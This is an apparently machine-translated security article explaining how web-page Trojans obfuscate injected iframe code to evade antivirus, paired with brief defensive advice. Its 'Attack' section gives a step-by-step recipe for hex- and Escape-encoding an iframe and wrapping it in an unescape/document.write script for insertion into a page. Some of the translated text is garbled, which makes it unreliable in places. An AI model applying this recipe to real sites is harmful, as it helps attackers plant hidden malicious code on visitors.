Analyze how webpage Trojans encrypt code to avoid killing

With the popularity of webpage Trojans, anti-virus software has begun to focus on various webpage Trojans, which makes many hackers very angry. However, hackers quickly found a way to solve the problem, which is to encrypt the Trojan-infected webpage code, disrupt the original code and make anti-virus software unrecognizable. Is it true that the encrypted webpage Trojan cannot be prevented? The answer is in the following text. Rising Tang Wei: senior security engineer with deep research on network security.
Encryption of Trojan-infected web pages is a common method used by hackers. This method can be used to circumvent anti-virus software. In recent years, when hackers initiate Trojan-infected web pages, generally, you can perform secondary encryption or even multiple encryption on the website code.
Most early hackers only used simple Unicode transcoding for encryption. However, web pages using this encryption method were quickly scanned and killed by anti-virus software, which could no longer be effective, as a result, web page encryption is gradually upgraded, from Escape convertible encoding encryption to Escape character encryption, and finally to custom functions for encryption.
 

Security Encyclopedia: Escape is a function in JavaScript, VBS, and other scripting languages. In JavaScript, Escape function plays a role in re-encoding and re-transmission of some non-English characters during the transfer process.

Why is webpage Trojan encrypted?

Webpage Trojans are hated by everyone, anti-virus software is also very concerned about it, and various preventive measures will also be taken. The spread of webpage Trojans is restricted. In order to survive better, in order not to be detected by security tools such as anti-virus software, many hackers encrypt webpage Trojans and increase the difficulty of anti-virus software detection and removal, this improves the survival rate of webpage Trojans. Therefore, mainstream web Trojans are encrypted.

There are many types of webpage Trojan encryption, most of which use the features of the conversion and encryption of various standards of webpage code. In a certain sense, this encryption method, it only interferes with the identification of anti-virus software that relies on signatures to identify webpage Trojans, but does not encrypt itself. Therefore, the more advanced encryption method is to define the function when writing the script language, and then encrypt the string, to create more thresholds that will confuse anti-virus software, so that they cannot be identified.

Encryption By character conversion is like speaking to a translation in Chinese. Our computer is a translation proficient in many languages. We will tell this translation in one sentence, the translation then copied the passage in English, and then replaced it with a replacement password, finally, use the Morse code to send the English text to another decrypted translation.

Since the entire process uses only basic code conversion, anyone who understands the English language will be able to unlock this password and understands the English language to replace the password, but for those who do not know English or do not report electricity, this is already very confusing. Next, we will take the most common Escape encryption method by hackers as an example to analyze the webpage Trojan encryption methods and prevention methods.

Security gossip: In the history of cryptography, the most famous password replacement tool was the "Enigma" cryptographic machine used by German troops during World War II, during the second war, Enigma provided excellent communication confidentiality measures for the German Army's lightning and German Naval "wolf" submarine warfare. In order to decrypt the Enigma, the Allied forces established a special deciphering center in the UK, in which the world's first computer was born, alan Turing, the father of the greatest computer in the 20th century, was the theory that had produced many prototype modern computers during the cracking of Enigma.

Webpage Trojan encryption/Decryption record

Attack

First, write the HTML code to be encrypted. Here we use the Code in the following IFRAME framework:

<Iframe src = http://soft.yesky.com width = 400 height = 300> </iframe>

Then log on to the convert website http://tool.chinaz.com.

Find "Code Conversion Tool" in the page, and then click Select "URL16 hexadecimal encryption" in the drop-down menu, and then enter the trojan web page link address http://soft.yesky.com into the address bar, click "encrypt" and set it to http: // % 73% 6F % 66% 2E % 74% 79% 65% 6B % 73% 2E % 79% 6F % 6D/(figure 1 ).

Then, paste the encrypted URL back to the original IFRAME code:

<Iframe src = http: // % 73% 6F % 66% 2E % 74% 79% 65% 6B % 73% 2E % 79% 6F % 6D/width = 63% height = 400> </iframe>

Click "Encode encryption/Decryption tool" in the "Code Conversion Tool" menu, copy the IFRAME code to the input box, and click "Encode encryption" to obtain the encrypted code: % 3 Ciframe + src % 3D + http % 3A % 2F % 2F % 2573% 256F % 2566% 2574% 252E % 2579% 2565% 2573% 256B % 2579% 252E % 2563% 256F % 256D % 2F + width % 3D400 + height % 3D300% 3E % 3C % 2 hour rame % 3E +
(Figure 2 ).

Then, open the WordPad program, enter the following code into the Wordpad, and copy the encryption code to the specified location:

<Script language = "Javascript"> <! --
Var Words = "copy the encrypted code here! "
Function OutWord ()
{
Var NewWords;
NewWords = unescape (Words)
Document. write (NewWords );
}
OutWord ();
// -->
</SCRIPT>
 

Finally, click "JS encryption/Decryption" in the "Code Conversion Tool" menu, copy the modified JavaScript code to the input box, and click "JS encryption ", complete the code encryption process (Figure 3) and add the encrypted code to the webpage where you want to insert the Trojan. Later, when a user accesses the website, the trojan will be activated.

 

Defense

When a security engineer encounters an encrypted malicious webpage, he also enters the conversion website, and then paste the complicated code into the decrypted input box. Then, he clicks the "decrypt" button to work out the original text. However, since decryption involves conversion between different character encodings, you must capture the characteristics of different encodings during decryption, such as in Escape encoding, it usually starts with "%". After converting Chinese to Escape encoding, it is often "%" followed by the lowercase letter "u", followed by four letters, they are hexadecimal characters.

The best way to prevent encrypted malicious web pages is to enable the script filtering function in anti-virus software, alternatively, select "Disable script debugging" in the "advanced" tab of Internet Options in IE ". In addition, JS encryption and urlhex encryption are sometimes automatically blocked in Firefox browsers. You can select Firefox when Browsing webpages that you suspect are dangerous.